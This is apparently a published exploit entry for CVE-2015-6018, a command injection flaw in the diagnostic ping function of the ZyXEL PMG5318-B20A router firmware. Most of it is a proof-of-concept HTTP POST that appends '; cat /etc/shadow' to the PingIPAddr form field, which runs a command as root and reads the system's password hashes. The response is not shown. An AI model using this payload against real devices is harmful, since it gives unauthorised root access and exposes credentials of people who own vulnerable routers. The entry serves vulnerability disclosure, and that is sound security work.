# Exploit Title: [ZyXEL PMG5318-B20A OS Command Injection Vulnerability] # Discovered by: Karn Ganeshen # CERT VU# 870744 # Vendor Homepage: [www.zyxel.com] # Version Reported: [Firmware version V100AANC0b5] # CVE-2015-6018 [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6018 ] *Vulnerability Details* CWE-20 : Improper Input Validation - CVE-2015-6018 The diagnostic ping function's PingIPAddr parameter in the ZyXEL PMG5318-B20A, firmware version V100AANC0b5, does not properly validate user input. An attacker can execute arbitrary commands as root. *OS Command Injection PoC* The underlying services are run as 'root'. It therefore, allows dumping system password hashes. *HTTP Request* POST /diagnostic/diagnostic_general.cgi HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http:///diagnostic/diagnostic_general.cgi Cookie: session=a457f8ad83ba22dc256cd0b002c66666 Connection: keep-alive Content-Type: multipart/form-data; boundary=-------------------------- -12062103314079176991367286444 Content-Length: 451 ——————————————12062103314079176991367286444 Content-Disposition: form-data; name="InfoDisplay” ——————————————12062103314079176991367286444 Content-Disposition: form-data; name="*PingIPAddr*" *8.8.8.8; cat /etc/shadow * ——————————————12062103314079176991367286444 Content-Disposition: form-data; name="Submit" Ping …. *HTTP Response * .....
General